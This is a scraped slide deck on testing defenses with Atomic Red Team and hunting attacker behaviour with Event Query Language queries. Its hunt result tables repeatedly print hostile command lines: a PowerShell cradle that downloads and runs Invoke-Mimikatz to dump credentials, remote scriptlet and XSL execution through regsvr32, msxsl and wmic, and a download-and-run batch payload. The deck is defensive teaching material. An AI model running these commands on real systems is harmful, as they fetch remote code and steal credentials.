Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 

Kürzlich hochgeladen (20)

Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 

Fantastic Red Team Attacks and How to Find Them

  • 1. and How to Find Them bit.ly/fantastic19
  • 2. Can you detect unknown attacks?
  • 3. qwinsta /server:bh-19 Casey Smith Director of Applied Research @ Red Canary Project Developer Atomic Red Team I love testing defenses Mostly Gryffindor Ross Wolf Senior Threat Researcher @ Endgame Created the Event Query Language Detector of attacker tradecraft Likely a Ravenclaw @rw_access@subTee
  • 4. Agenda ● How to test with Atomic Red Team ○ Frequently missed attacks ○ How do we test security tools? ● How to hunt with Event Query Language (EQL) ○ Introduction to behavioral detection ○ Crash course with examples ● Red vs Blue ○ Exercise using EQL to finding unknown threats ○ Investigate a sample data set ○ Uncover a new attacker technique ● Conclusions bit.ly/fantastic19
  • 6. Many defenders do not know HOW to start testing, or they are not testing well. This was the reason we created Atomic Red Team.
  • 7. What is Atomic Red Team? ● Open source project for testing for security controls ● YAML described tests mapped to MITRE ATT&CK™ ● Simple easy tests—many can be run in a single command line ● Demystify attacks by providing code and examples ● DOES NOT replace human red team, adversary emulation, adaptation. atomicredteam.io
  • 8. Example Atomic Technique YAML attack_technique: T1118 display_name: InstallUtil atomic_tests: - name: InstallUtil GetHelp method call supported_platforms: - windows input_arguments: filename: description: location of the payload type: Path default: C:AtomicRedTeamatomicsT1118srcT1118.dll executor: name: command_prompt command: | C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe /? #{filename}
  • 9. Easy to Automate, Chain Tests Together. Tests are benign and can be fully customized as needed.
  • 10. Observations with Atomic Red Team ● Validate telemetry collection & detection logic ● Understanding your data and visibility ● Knowledge of the environment ● Detections for common techniques
  • 11. Frequently Missed MITRE ATT&CK Techniques ● T1036 Masquerading ● T1047 Windows Management Instrumentation ● T1055 Process Injection ● T1118 InstallUtil ● T1127 Trusted Developer Tools ● T1170 MSHTA ● T1220 XSL Script Processing Often leverage built-in native OS tools
  • 12. Prepare For Actual Incidents InstallUtil (MITRE ATT&CK T1118) https://securelist.com/using-legitimate-tools-to-hide-malicious-code/83074/ MSBuild (MITRE ATT&CK T1127) https://unit42.paloaltonetworks.com/unit42-paranoid-plugx/
  • 13. Atomic Red Team May Help Organizations Prepare By introducing small, benign examples to test and practice response/coverage/hunting.
  • 15. Behaviors occur over time and we need to monitor where the action happens. We can get answers to behavioral questions with the Event Query Language.
  • 16. Event Query Language ● Simple syntax designed for hunting and detection ● Supports contextual and complex behaviors ● Tracks lineage and event sequences statefully ● Filter, stack and sift through data with pipes ● Dynamic shell for querying data eql.readthedocs.io
  • 17. Event Queries ● <event type> where <condition> ● and or not < <= == != >= > ● Wildcard with asterisk * ● Case-insensitive comparisons process where process_name == "svchost.exe" and not (command_line == "* -k *" or parent_process_name == "services.exe")
  • 18. Sequences ● Match multiple events in order ● Shared properties with by syntax ● Timeouts with maxspan=5m ● Statefully expire sequences with until condition sequence with maxspan=<time> [ <event_type> where <condition>] by <A>, <B>, <C> [ <event_type> where <condition>] by <D>, <E>, <F>
  • 19. Sequences ● Match multiple events in order ● Shared properties with by syntax ● Timeouts with maxspan=5m ● Statefully expire sequences with until condition sequence with maxspan=5m [ file where file_name == "*.exe" and user_name != "SYSTEM"] by file_path [ process where user_name == "SYSTEM"] by process_path
  • 20. Join ● Multiple events without ordering ● No time limitations ● Allows by and until syntax join [<event_type> where <condition>] [<event_type> where <condition>]
  • 21. Join ● Multiple events without ordering ● No time limitations ● Allows by and until syntax join [file where file_path == "*System32Tasksh4x0r.xml"] [registry where registry_path == "*runonceh4xor"]
  • 22. Join ● Multiple events without ordering ● No time limitations ● Allows by and until syntax join by source_ip, destination_ip [network where destination_port == 3389] // RDP [network where destination_port == 135] // RPC [network where destination_port == 445] // SMB
  • 23. Data Pipes ● Perform data stacking while hunting ● Process results by filtering, counting and removing duplicates count filter head sort tail unique unique_count process where user_name != "SYSTEM" | unique process_name, user_name | unique_count process_name | filter count == 1
  • 24. Process Lineage ● Natively tracks lineage by monitoring process create and terminate ● Supports descendant of, child of, and event of relationships ● Combine or nest with other logic network where process_name == "powershell.exe" and descendant of [process where process_name in ("outlook.exe", "winword.exe", "powerpnt.exe", "excel.exe")]
  • 25. DEMO
  • 27. Setting the Stage ● Windows endpoint with Sysmon installed ● Real background noise ● Data exported to json.gz file Gols Blue Team Objective: Find the red team and scope the compromise Red Team Objective: Target a developer system with a unique attack
  • 28. Investigative Process ● Gather an initial set of suspicious activity ○ Alerting from existing detectors ○ Hunting for evidence of compromise ● Reduce the data set until it’s manageable ● Triage results to determine good or bad ● Scope the compromise by pulling on threads
  • 30. Guiding Questions ● What persistence locations are new? ● Are there unusual process relationships? ● Were there attempts to blend in? ● Did anything start behaving differently? ○ First seen network connection for a process ○ First lateral movement attempt for a user Think situational awareness + ATT&CK tactics
  • 31. mutatio corporis Were any native tools renamed and executed? process where subtype.create and original_file_name != process_name and original_file_name in ( "cmd.exe", "certutil.exe", "cscript.exe", "dsquery.exe", "installutil.exe", "powershell.exe", "rundll32.exe", "wscript.exe", ) | unique original_file_name, file_name 0 results found
  • 32. lolbas revello What callbacks were established from binaries used to live off the land? sequence by unique_pid [process where subtype.create and process_name in ( "Atbroker.exe", "Bash.exe", "Bitsadmin.exe", "Certutil.exe", "Cmdkey.exe", "Cmstp.exe", "Control.exe", "Csc.exe", "Cscript.exe", "Dfsvc.exe", "Diskshadow.exe", "Dnscmd.exe", "Esentutl.exe", "Extexport.exe", "Extrac32.exe", "Expand.exe", // 61 binaries from https://github.com/api0cradle/LOLBAS/blob/master/LOLBins.md )] [network where subtype.outgoing] | unique events[0].command_line 8 results found
  • 33. lolbas revello event_type parent_process_name process_name command_line destination process amazonAssistantService.exe mshta.exe "mshta.exe" "C:Program Files (x86)AmazonAmazon Assistantaa.hta" network mshta.exe images-na.ssl-images-amazon.com process explorer.exe powershell.exe "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" network powershell.exe go.microsoft.com process cmd.exe powershell.exe powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/ atomic-red-team/master/ARTifacts/Chain_Reactions/ chain_reaction_DragonsTail.ps1') network powershell.exe raw.githubusercontent.com process cmd.exe powershell.exe powershell.exe IWR -uri "https://raw.githubusercontent.com/ redcanaryco/atomic-red-team/master/ARTifacts/ Chain_Reactions/chain_reaction_DragonsTail.bat" -OutFile "~Documentspayload.bat" ; ~Documentspayload.bat network powershell.exe raw.githubusercontent.com
  • 34. Please, you don’t understand... Nothing in there is dangerous. Triage Results
  • 35. Guiding Questions ● Is the path unexpected? ● Do file names look like Windows binaries? ● Was the PE image signed? ● Is it a legitimate product? ● Has this been publically reported?
  • 36. lolbas revello event_type parent_process_name process_name command_line destination process amazonAssistantService.exe mshta.exe "mshta.exe" "C:Program Files (x86)AmazonAmazon Assistantaa.hta" network mshta.exe images-na.ssl-images-amazon.com process explorer.exe powershell.exe "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" network powershell.exe go.microsoft.com process cmd.exe powershell.exe powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/ atomic-red-team/master/ARTifacts/Chain_Reactions/ chain_reaction_DragonsTail.ps1') network powershell.exe raw.githubusercontent.com process cmd.exe powershell.exe powershell.exe IWR -uri "https://raw.githubusercontent.com/ redcanaryco/atomic-red-team/master/ARTifacts/ Chain_Reactions/chain_reaction_DragonsTail.bat" -OutFile "~Documentspayload.bat" ; ~Documentspayload.bat network powershell.exe raw.githubusercontent.com
  • 37. event_type parent_process_name process_name command_line destination process amazonAssistantService.exe mshta.exe "mshta.exe" "C:Program Files (x86)AmazonAmazon Assistantaa.hta" network mshta.exe images-na.ssl-images-amazon.com process explorer.exe powershell.exe "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" network powershell.exe go.microsoft.com process cmd.exe powershell.exe powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/ atomic-red-team/master/ARTifacts/Chain_Reactions/ chain_reaction_DragonsTail.ps1') network powershell.exe raw.githubusercontent.com process cmd.exe powershell.exe powershell.exe IWR -uri "https://raw.githubusercontent.com/ redcanaryco/atomic-red-team/master/ARTifacts/ Chain_Reactions/chain_reaction_DragonsTail.bat" -OutFile "~Documentspayload.bat" ; ~Documentspayload.bat network powershell.exe raw.githubusercontent.com lolbas revello ✔Atomic Testing
  • 38. event_type parent_process_name process_name command_line destination process amazonAssistantService.exe mshta.exe "mshta.exe" "C:Program Files (x86)AmazonAmazon Assistantaa.hta" network mshta.exe images-na.ssl-images-amazon.com process explorer.exe powershell.exe "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" network powershell.exe go.microsoft.com process cmd.exe powershell.exe powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/ atomic-red-team/master/ARTifacts/Chain_Reactions/ chain_reaction_DragonsTail.ps1') network powershell.exe raw.githubusercontent.com process cmd.exe powershell.exe powershell.exe IWR -uri "https://raw.githubusercontent.com/ redcanaryco/atomic-red-team/master/ARTifacts/ Chain_Reactions/chain_reaction_DragonsTail.bat" -OutFile "~Documentspayload.bat" ; ~Documentspayload.bat network powershell.exe raw.githubusercontent.com lolbas revello ✔Atomic Testing ✔ Legitimate Amazon
  • 39. lolbas revello event_type parent_process_name process_name command_line destination process svchost.exe regsvr32.exe regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/ atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/ atomics/T1117/RegSvr32.sct scrobj.dll network regsvr32.exe raw.githubusercontent.com process powershell.exe powershell.exe "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" "IEX (New-Object Net.WebClient).DownloadString( 'https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/ module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" network powershell.exe raw.githubusercontent.com process explorer.exe InstallUtil.exe "C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe" /? C:UsersNEWTSC~1AppDataLocalTemp a3541d3f-a4db-c8b0-dab7-c268095df70e.chm network InstallUtil.exe 10.10.10.10 process services.exe msiexec.exe C:Windowssystem32msiexec.exe /V network msiexec.exe oscp.digicert.com
  • 40. event_type parent_process_name process_name command_line destination process svchost.exe regsvr32.exe regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/ atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/ atomics/T1117/RegSvr32.sct scrobj.dll network regsvr32.exe raw.githubusercontent.com process powershell.exe powershell.exe "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" "IEX (New-Object Net.WebClient).DownloadString( 'https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/ module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" network powershell.exe raw.githubusercontent.com process explorer.exe InstallUtil.exe "C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe" /? C:UsersNEWTSC~1AppDataLocalTemp a3541d3f-a4db-c8b0-dab7-c268095df70e.chm network InstallUtil.exe 10.10.10.10 process services.exe msiexec.exe C:Windowssystem32msiexec.exe /V network msiexec.exe oscp.digicert.com lolbas revello ✔Atomic Testing ✔Legitimate Windows
  • 41. lolbas revello event_type parent_process_name process_name command_line destination process explorer.exe powershell.exe "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" network powershell.exe go.microsoft.com process powershell.exe powershell.exe "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" "IEX (New-Object Net.WebClient).DownloadString( 'https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/ module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" network powershell.exe raw.githubusercontent.com process explorer.exe InstallUtil.exe "C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe" /? C:UsersNEWTSC~1AppDataLocalTemp a3541d3f-a4db-c8b0-dab7-c268095df70e.chm network InstallUtil.exe 10.10.10.10
  • 42. explicate parvuli What descendants were spawned from the interactive PowerShell console? process where subtype.create and descendant of [ network where event of [ process where subtype.create and parent_process_name == "explorer.exe" and process_name == "powershell.exe" ] ] 43 results found
  • 43. explicate parvuli What descendants were spawned from the interactive PowerShell console? process_name command_line csc.exe "C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe" /noconfig /fullpaths @"C:UsersNewtScamanderAppDataLocalTempcwit4koq.cmdline" cvtres.exe C:WindowsMicrosoft.NETFramework64v4.0.30319cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:UsersNEWTSC~1AppDataLocalTempRES6F90.tmp" "c:UsersNewtScamanderAppDataLocalTempCSCFCD426139CD74D618CE7A9833BF7FF69.TMP" cmd.exe "C:Windowssystem32cmd.exe" /c "C:WindowsMicrosoft.NETFrameworkv4.0.30319csc.exe /target:library /out:C:AtomicRedTeamatomicsT1118srcT1118.dll C:AtomicRedTeamatomicsT1118srcT1118.cs " csc.exe C:WindowsMicrosoft.NETFrameworkv4.0.30319csc.exe /target:library /out:C:AtomicRedTeamatomicsT1118srcT1118.dll C:AtomicRedTeamatomicsT1118srcT1118.cs cvtres.exe C:WindowsMicrosoft.NETFrameworkv4.0.30319cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:UsersNEWTSC~1AppDataLocalTempRES2728.tmp" "c:AtomicRedTeamatomicsT1118srcCSC7414F1A333B45CDB71DB995A782FCC.TMP" cmd.exe "C:Windowssystem32cmd.exe" /c "C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe /logfile= /LogToConsole=false /U C:AtomicRedTeamatomicsT1118srcT1118.dll" Showing results 1-6 of 43
  • 44. explicate parvuli What descendants were spawned from the interactive PowerShell console? process_name command_line InstallUtil.exe C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe /logfile= /LogToConsole=false /U C:AtomicRedTeamatomicsT1118srcT1118.dll cmd.exe "C:Windowssystem32cmd.exe" /c cmd.exe "C:Windowssystem32cmd.exe" /c "C:WindowsMicrosoft.NETFrameworkv4.0.30319csc.exe /target:library /out:C:AtomicRedTeamatomicsT1118srcT1118.dll C:AtomicRedTeamatomicsT1118srcT1118.cs " csc.exe C:WindowsMicrosoft.NETFrameworkv4.0.30319csc.exe /target:library /out:C:AtomicRedTeamatomicsT1118srcT1118.dll C:AtomicRedTeamatomicsT1118srcT1118.cs cvtres.exe C:WindowsMicrosoft.NETFrameworkv4.0.30319cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:UsersNEWTSC~1AppDataLocalTempRES2DBF.tmp" "c:AtomicRedTeamatomicsT1118srcCSC137A13BC43A744468D2FF98C3FC48643.TMP" cmd.exe "C:Windowssystem32cmd.exe" /c "C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe /? C:AtomicRedTeamatomicsT1118srcT1118.dll" Showing results 7-12 of 43
  • 45. explicate parvuli What descendants were spawned from the interactive PowerShell console? process_name command_line InstallUtil.exe C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe /? C:AtomicRedTeamatomicsT1118srcT1118.dll cmd.exe "C:Windowssystem32cmd.exe" /c cmd.exe "C:Windowssystem32cmd.exe" /c "C:WindowsMicrosoft.NETFrameworkv4.0.30319msbuild.exe T1127.csproj" MSBuild.exe C:WindowsMicrosoft.NETFrameworkv4.0.30319msbuild.exe T1127.csproj cmd.exe "C:Windowssystem32cmd.exe" /c cmd.exe "C:Windowssystem32cmd.exe" /c "C:WindowsTempmsxsl.exe C:AtomicRedTeamatomicsT1220srcmsxslxmlfile.xml C:AtomicRedTeamatomicsT1220srcmsxslscript.xsl" cmd.exe "C:Windowssystem32cmd.exe" /c cmd.exe "C:Windowssystem32cmd.exe" /c "C:WindowsTempmsxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl" Showing results 13-20 of 43
  • 46. explicate parvuli What descendants were spawned from the interactive PowerShell console? process_name command_line cmd.exe "C:Windowssystem32cmd.exe" /c cmd.exe "C:Windowssystem32cmd.exe" /c "wmic.exe process /FORMAT:list" WMIC.exe wmic.exe process /FORMAT:list cmd.exe "C:Windowssystem32cmd.exe" /c cmd.exe "C:Windowssystem32cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmics cript.xsl" WMIC.exe wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmics cript.xsl cmd.exe "C:Windowssystem32cmd.exe" /c cmd.exe "C:Windowssystem32cmd.exe" /c "C:WindowsTempmsxsl.exe C:AtomicRedTeamatomicsT1220srcmsxslxmlfile.xml C:AtomicRedTeamatomicsT1220srcmsxslscript.xsl" Showing results 21-28 of 43
  • 47. explicate parvuli What descendants were spawned from the interactive PowerShell console? process_name command_line msxsl.exe C:WindowsTempmsxsl.exe C:AtomicRedTeamatomicsT1220srcmsxslxmlfile.xml C:AtomicRedTeamatomicsT1220srcmsxslscript.xsl calc.exe "C:WindowsSystem32calc.exe" cmd.exe "C:Windowssystem32cmd.exe" /c cmd.exe "C:Windowssystem32cmd.exe" /c "C:WindowsTempmsxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl" msxsl.exe C:WindowsTempmsxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl calc.exe "C:WindowsSystem32calc.exe" cmd.exe "C:Windowssystem32cmd.exe" /c Showing results 29-35 of 43
  • 48. explicate parvuli What descendants were spawned from the interactive PowerShell console? process_name command_line cmd.exe "C:Windowssystem32cmd.exe" /c "wmic.exe process /FORMAT:list" WMIC.exe wmic.exe process /FORMAT:list cmd.exe "C:Windowssystem32cmd.exe" /c cmd.exe "C:Windowssystem32cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmics cript.xsl" WMIC.exe wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmics cript.xsl cmd.exe "C:Windowssystem32cmd.exe" /c WMIC.exe "C:WindowsSystem32WbemWMIC.exe" os get /format:wmicscript WMIC.exe "C:WindowsSystem32WbemWMIC.exe" os get /format:wmicscript.xsl Showing results 36-43 of 43
  • 49. event_type parent_process_name process_name command_line destination process explorer.exe powershell.exe "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" network powershell.exe go.microsoft.com process powershell.exe powershell.exe "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" "IEX (New-Object Net.WebClient).DownloadString( 'https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/ module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" network powershell.exe raw.githubusercontent.com process explorer.exe InstallUtil.exe "C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe" /? C:UsersNEWTSC~1AppDataLocalTemp a3541d3f-a4db-c8b0-dab7-c268095df70e.chm network InstallUtil.exe 10.10.10.10 lolbas revello ✔Atomic Testing
  • 50. claves revelare What loaded the PowerShell module Invoke-Mimikatz? sequence [process where subtype.create] by unique_pid [process where subtype.create and command_line == "*Invoke-Mimikatz*"] by unique_ppid 1 result found
  • 51. claves revelare What loaded the PowerShell module Invoke-Mimikatz? parent_process_name command_line cmd.exe powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/ Chain_Reactions/chain_reaction_DragonsTail.ps1') powershell.exe "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/ Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
  • 52. lolbas revello event_type parent_process_name process_name command_line destination process explorer.exe powershell.exe "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" network powershell.exe go.microsoft.com process powershell.exe powershell.exe "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" "IEX (New-Object Net.WebClient).DownloadString( 'https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/ module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" network powershell.exe raw.githubusercontent.com process explorer.exe InstallUtil.exe "C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe" /? C:UsersNEWTSC~1AppDataLocalTemp a3541d3f-a4db-c8b0-dab7-c268095df70e.chm network InstallUtil.exe 10.10.10.10 ✔Atomic Testing
  • 53. lolbas revello event_type parent_process_name process_name command_line destination process explorer.exe InstallUtil.exe "C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe" /? C:UsersNEWTSC~1AppDataLocalTemp a3541d3f-a4db-c8b0-dab7-c268095df70e.chm network InstallUtil.exe 10.10.10.10 ✘ Red Team
  • 54. distincta imperium What unique PowerShell commands were seen? process where subtype.create and process_name == "powershell.exe" and command_line == "* *" | unique_count command_line 3 unique results found
  • 55. distincta imperium count command_line 1 powershell.exe IWR -uri "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/ chain_reaction_DragonsTail.bat" -OutFile "~Documentspayload.bat" ; ~Documentspayload.bat 1 powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/ chain_reaction_DragonsTail.ps1') 1 "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/ module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
  • 56. distincta imperium count command_line 1 powershell.exe IWR -uri "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/ chain_reaction_DragonsTail.bat" -OutFile "~Documentspayload.bat" ; ~Documentspayload.bat 1 powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/ chain_reaction_DragonsTail.ps1') 1 "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/ module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" ✔Atomic Testing
  • 57. What files were created by non-SYSTEM users but later executed as SYSTEM? integritas campester sequence [file where subtype.create and event of [process where subtype.create and user_name != "SYSTEM"]] by file_path [process where subtype.create and user_name == "SYSTEM"] by process_path 0 results found
  • 58. network where subtype.outgoing | unique process_path | tail 15 What processes recently made their first network connection? novum nexumus 15 results found
  • 59. novum nexumus destination port process_path user_name vo.mscnd.net 443 C:Program Files (x86)Microsoft Visual StudioInstallerresourcesappServiceHubServices Microsoft.VisualStudio.Setup.ServiceBackgroundDownload.exe NewtScamander storeedgefd.dsx .mp.microsoft.com 443 C:Program FilesWindowsApps Microsoft.WindowsStore_11706.1002.9.0_x64__8wekyb3d8bbwe WinStore.App.exe NewtScamander 10.10.10.10 8443 C:WindowsMicrosoft.NETFrameworkv4.0.30319 InstallUtil.exe NewtScamander www.bing.com 443 C:WindowsSystem32BackgroundTransferHost.exe NewtScamander 10.10.10.129 22 C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe NewtScamander 10.10.10.10 8443 C:WindowsSystem32notepad.exe NewtScamander watson.telemetry .microsoft.com 443 c:windowssystem32taskhostw.exe NewtScamander vo.msecnd.net 443 C:Program Files (x86)Microsoft Visual Studio2019CommunityCommon7ServiceHub controllerMicrosoft.ServiceHub.Controller.exe NewtScamander
